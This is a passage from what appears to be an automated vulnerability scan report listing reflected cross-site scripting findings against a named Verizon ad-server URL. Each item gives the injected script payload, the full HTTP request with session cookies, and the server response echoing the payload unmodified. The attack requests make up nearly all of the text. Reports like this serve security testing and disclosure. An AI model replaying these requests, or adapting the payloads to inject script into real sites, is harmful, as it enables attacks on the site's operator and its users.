<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
e=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=4dcdc"><script>alert(1)</script>690eb2ffc82&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.59. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [partner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 476c8"><script>alert(1)</script>1cd684a7591 was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=476c8"><script>alert(1)</script>1cd684a7591&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:52:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=476c8"><script>alert(1)</script>1cd684a7591&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.60. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popcity parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popcity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ae33"><script>alert(1)</script>082704e552e was submitted in the popcity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=3ae33"><script>alert(1)</script>082704e552e&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:50:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/569197284/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=3ae33"><script>alert(1)</script>082704e552e&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=
...[SNIP]...

3.61. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popcounty parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popcounty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db20a"><script>alert(1)</script>ad98c8a48bd was submitted in the popcounty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=db20a"><script>alert(1)</script>ad98c8a48bd&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:51:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
und2.net/homepage/L24/216072555/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=db20a"><script>alert(1)</script>ad98c8a48bd&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&w
...[SNIP]...

3.62. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popdma parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popdma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671eb"><script>alert(1)</script>2aafe3d0cfd was submitted in the popdma parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=671eb"><script>alert(1)</script>2aafe3d0cfd&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:51:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/homepage/L24/920753079/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=671eb"><script>alert(1)</script>2aafe3d0cfd&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhostin
...[SNIP]...

3.63. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popindicator parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popindicator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21fa6"><script>alert(1)</script>3ed604c7372 was submitted in the popindicator parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=21fa6"><script>alert(1)</script>3ed604c7372&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:49:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ne.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/1588911915/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=21fa6"><script>alert(1)</script>3ed604c7372&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_
...[SNIP]...

3.64. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33f3"><script>alert(1)</script>46c97c97412 was submitted in the popip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=e33f3"><script>alert(1)</script>46c97c97412&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:49:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
al.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/1866239870/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=e33f3"><script>alert(1)</script>46c97c97412&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&au
...[SNIP]...

3.65. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popservice parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popservice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 289de"><script>alert(1)</script>a27e6e3596 was submitted in the popservice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=289de"><script>alert(1)</script>a27e6e3596&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:51:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1358
Content-Type: text/html
Cache-Control: private
Content-Length: 1358

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
4/997221546/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=289de"><script>alert(1)</script>a27e6e3596&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb
...[SNIP]...

3.66. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popstate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1949"><script>alert(1)</script>a3917a638a8 was submitted in the popstate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=d1949"><script>alert(1)</script>a3917a638a8&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:50:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ds/click_lx.ads/vzsurround2.net/homepage/L24/218393888/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=d1949"><script>alert(1)</script>a3917a638a8&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&onli
...[SNIP]...

3.67. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popzipcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popzipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94696"><script>alert(1)</script>f2fcdc1fb36 was submitted in the popzipcode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=94696"><script>alert(1)</script>f2fcdc1fb36&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:50:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ads/vzsurround2.net/homepage/L24/242581337/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=94696"><script>alert(1)</script>f2fcdc1fb36&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&s
...[SNIP]...

3.68. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [prizm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the prizm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d47"><script>alert(1)</script>810ed66b159 was submitted in the prizm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=56d47"><script>alert(1)</script>810ed66b159&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:52:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=56d47"><script>alert(1)</script>810ed66b159&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex
...[SNIP]...

3.69. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [pts parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the pts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862d1"><script>alert(1)</script>ce12940af71 was submitted in the pts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

